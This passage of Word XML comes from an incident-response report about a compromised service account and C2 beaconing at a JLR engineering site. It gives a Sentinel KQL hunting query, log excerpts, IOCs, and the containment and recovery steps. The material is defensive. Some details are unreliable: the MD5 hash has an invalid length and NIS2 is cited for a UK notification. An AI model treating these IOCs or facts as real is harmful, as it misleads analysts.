      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SOC analyst queried Sentinel KQL to determine full blast radius — all authentication events and network connections from compromised service account SVC-CAD-SYNC01 in prior 24 hours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OT boundary probe confirmation: Palo Alto NGFW logs confirmed 3 SYN packets to VLAN 30 OT MES gateway — all DENIED. Claroty OT platform confirmed no S7 communication was established. OT systems confirmed unaffected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Darktrace confirmed C2 beaconing from JLR-ENG-WS-047 to 185.234.219.47 — 14 beacon cycles completed before Antigena autonomous block activated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FS-RD-COV-01 file server access logs reviewed — 1,247 file access events confirmed from SVC-CAD-SYNC01 in R&amp;D shared drives including the Electric Range Rover BMS firmware repository. Data exfiltration status: UNCONFIRMED (DLP analysis in progress).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1"/>
              <w:bottom w:val="single" w:color="2D6A4F" w:sz="1"/>
              <w:right w:val="single" w:color="2D6A4F" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="050D1A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="200"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="200"/>
              <w:right w:type="dxa" w:w="280"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFE066"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">// KQL — Sentinel scope query: SVC-CAD-SYNC01 activity in past 24 hours</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">SecurityEvent</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| where TimeGenerated &gt; ago(24h)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| where AccountName == "SVC-CAD-SYNC01"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| where EventID in (4624, 4625, 4648, 4768, 4769, 4776, 7045)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, Computer, EventID, AccountName, LogonType, IpAddress, Activity</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF9F"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">// Results (excerpt) — 47 events returned:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">2026-03-17T19:14:01Z  JLR-ENG-FS-COV-01  4624  SVC-CAD-SYNC01  3  10.20.0.15  Logon (normal — scheduled sync)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A8D8A8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">2026-03-17T21:00:00Z  JLR-ENG-FS-COV-01  4634  SVC-CAD-SYNC01  3  10.20.0.15  Logoff (normal)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">2026-03-18T02:28:47Z  JLR-ENG-WS-012     4624  SVC-CAD-SYNC01  3  10.20.1.12  ANOMALOUS — lateral from WS-047</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">2026-03-18T02:29:14Z  JLR-ENG-WS-012     7045  SVC-CAD-SYNC01  -  10.20.1.12  Service Install: WindowsUpdateHelper</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">2026-03-18T02:33:19Z  FS-RD-COV-01       4624  SVC-CAD-SYNC01  3  10.20.1.47  File server access — 1,247 files opened</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="18"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF9F"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">// Account auto-disabled at 02:41:09Z by Sentinel playbook PB-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3 Phase 3 — Containment, Eradication, and Recovery</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1B1B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP 3 — Short-Term Containment (02:58–03:30 UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Network isolation of JLR-ENG-WS-047: CrowdStrike Falcon Network Containment activated remotely by SOC analyst — host removed from network (allow-list only: SOC management VLAN 60 communication). Timestamp: 02:58:14 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Network isolation of JLR-ENG-WS-012: Same CrowdStrike containment applied. Timestamp: 03:01:47 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C2 IP block: 185.234.219.47 added to Palo Alto NGFW external block list across all sites via Panorama — all traffic to/from this IP dropped globally. Timestamp: 03:04:22 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS sinkhole: DNS entries for all observed C2 subdomain-randomized domains added to JLR internal DNS sinkhole — redirecting beacon traffic to SOC capture IP for continued observation. Timestamp: 03:09:55 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SVC-CAD-SYNC01 account: Already auto-disabled by Sentinel playbook. Password reset queued. Service account Kerberos tickets purged via klist purge on all DCs. Timestamp: 03:12:00 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OT VLAN 30 emergency review: Claroty confirmed no unauthorized S7 commands executed; Siemens MES gateway logs showed only the 3 blocked SYN packets with no response. OT operations lead notified — no manufacturing line impact.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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP 4 — Long-Term Containment and Eradication (03:30–06:00 UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Forensic imaging: CrowdStrike Falcon Real Time Response (RTR) used to collect memory images and process lists from both isolated hosts. Full disk image initiated on JLR-ENG-WS-047 via KAPE triage collection to secure forensic VLAN 60 share. Timestamp: 03:30 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Malware removal: svcupd.exe and WindowsUpdateHelper service removed from both hosts. Malware sample submitted to CrowdStrike Intelligence and VirusTotal for attribution. MD5: d3b4a2c1e7f85601. SHA256: a3f8d2c1e7b94560f12a3d8e9c7b14f6a2d3e8c9b7a14560f12a3d8e9c7b14f6.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistence removal: HKCU and HKLM Run keys audited on both hosts; no additional persistence mechanisms found. Scheduled tasks reviewed — clean.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Credential hygiene: All accounts authenticated from JLR-ENG-WS-047 and JLR-ENG-WS-012 in past 30 days identified (31 accounts). Password resets issued for all 31. MFA token re-registration required on next login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">YARA/IOC sweep: CrowdStrike deployed custom YARA rule for svcupd.exe hash and known strings across all VLAN 20 endpoints (847 hosts). Result: 2 additional hosts found with payload artifact — isolated and remediated.</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0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP 5 — Recovery (06:00–06:58 UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JLR-ENG-WS-047 reimaged from gold image baseline — EV R&amp;D workstation configuration template v14.2. Deployed at 06:00 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JLR-ENG-WS-012 reimaged. Both hosts returned to VLAN 20 with CrowdStrike monitoring confirmed active. CrowdStrike Falcon containment lifted at 06:45 UTC after clean confirmation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SVC-CAD-SYNC01 service account re-enabled with new 32-character random password (stored in CyberArk PAM vault — no human knowledge), restricted logon hours 06:00–20:00, and additional conditional access policy requiring logon from authorized service host only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Full containment declared by Incident Response Lead at 06:58:22 UTC. SNW-20260318-04412 updated to 'Resolved' status. CISO and CTO notified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.4 Phase 4 — Post-Incident Activity</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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP 6 — Post-Incident Review and Reporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NIS2 notification: UK NCSC notified within 24 hours per NIS2 transposition obligation — submission reference NCSC-IR-2026-0318-JLR filed 18 March 2026 19:00 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exfiltration investigation: DLP log review and FS-RD-COV-01 access pattern analysis confirmed 1,247 file metadata reads (filenames/paths only) but no evidence of data leaving the network — Darktrace total outbound to C2 was 1.2 MB (consistent with command-and-control channel only, not bulk data transfer). Status: No confirmed exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-incident report: Full PIR completed within 5 business days per CIRP requirements. Root cause: CrowdStrike Falcon in alert-only mode on VLAN 20 allowed credential dump to complete before SOC detection. Remediation: Falcon moved to full prevention mode on VLAN 20 following R&amp;D business impact assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat intel sharing: IOCs (185.234.219.47, svcupd.exe hash, C2 domain patterns) shared with UK Auto-ISAC and Tata Group CISO office.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Training: Mandatory phishing awareness training issued to all VLAN 20 R&amp;D staff. Simulated spear-phishing campaign scheduled for 30 April 2026 to validate improvement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Control improvements: (a) PDF macro execution blocked via Defender ASR rule on all VLAN 20 hosts; (b) SVC accounts added to privileged account monitoring with off-hours logon alerting; (c) OT boundary probe now triggers automated host isolation via Sentinel SOAR playbook (not alert-only).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A2A" w:sz="10" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A2A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Incident Metrics and Controls Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 Response Time Metrics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Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Target (CIRP SLA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Actual (INC-0312)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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Result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Time to Detection (TTD)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&lt; 30 min from first IOC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38 min (02:03 phish → 02:41 alert)</w:t>
